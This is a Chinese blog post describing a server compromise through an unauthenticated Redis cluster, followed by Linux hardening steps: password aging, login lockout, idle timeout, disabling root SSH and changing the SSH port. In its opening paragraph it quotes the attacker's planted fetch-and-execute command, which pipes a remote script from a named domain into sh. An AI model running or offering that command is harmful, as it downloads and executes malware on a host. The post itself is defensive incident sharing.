cnroadbridge

故事是这样子的

最近主机受到攻击,原因可能是redis集群没有设置密码(因为快过期了,不想搞得太复杂就没设),然后被人家搞事情了,就被人一把set了些执行脚本,形如curl -fsSL http://d.powerofwish.com/pm.sh | sh,真的是猥琐啊,我登上主机一看,简直是猥琐至极,不能忍了啊。

⚡/ataola/github  ssh root@xx.xxx.xxx.xxx
root@xx.xxx.xxx.xxx's password:
Last failed login: Sat Jul 11 09:52:04 CST 2020 from 182.61.37.35 on ssh:notty
There were 206 failed login attempts since the last successful login.
Last login: Fri Jul 10 16:42:01 2020 from 122.224.125.196
⚡ root@ataola  ~ 

以下是我做的一些努力,分享一下。

Linux账户口令生存期策略

口令老化(Password aging)是一种增强的系统口令生命期认证机制,能够确保用户的口令定期更换,提高系统安全性。

我们可以这样子做,把密码设置成三个月过期,具体的操作步骤如下:

# 打开etc目录下的login.defs
vim /etc/login.defs
# 添加楼下内容
PASS_MAX_DAYS 90

Linux账户登录失败锁定策略

设置账户登录失败锁定策略,加大用户口令被暴力破解的难度。

我们可以这样子做,只要是对面那位连续输错5次密码,我们就给它关小黑屋5分钟。,具体的操作步骤如下:

# 打开etc目录下的pam.d下的password-auth文件
vim /etc/pam.d/password-auth
# 添加楼下内容
auth required pam_tally2.so deny=5 unlock_time=300 even_deny_root root_unlock_time=300
account required pam_tally2.so

Linux账户超时自动登出策略

配置帐户超时自动登出,在用户输入空闲一段时间后自动断开。

具体操作如下:

# 打开/etc/profile
vim /etc/profile
# 输入楼下内容
export TMOUT=180

限制root用户远程登录策略

限制root权限远程登录。先以普通权限用户远程登录后,再切换到超级管理员权限账号后执行相应操作,可以提升系统安全性。

具体操作如下:

# 打开/etc/ssh/sshd_config
vim /etc/ssh/sshd_config
# 添加楼下内容
PermitRootLogin no
# 重启sshd服务

更改ssh监听端口

SSH监听在默认的22端口容易受到暴力破解攻击,修改为非默认端口可以提高系统的安全性

具体操作是修改/etc/ssh/sshd_config配置文件中的端口字段配置(Port字段),并重启服务

终极大招

封ip吧。。。。。。

知识共享许可协议
本作品采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议进行许可。

相关文章: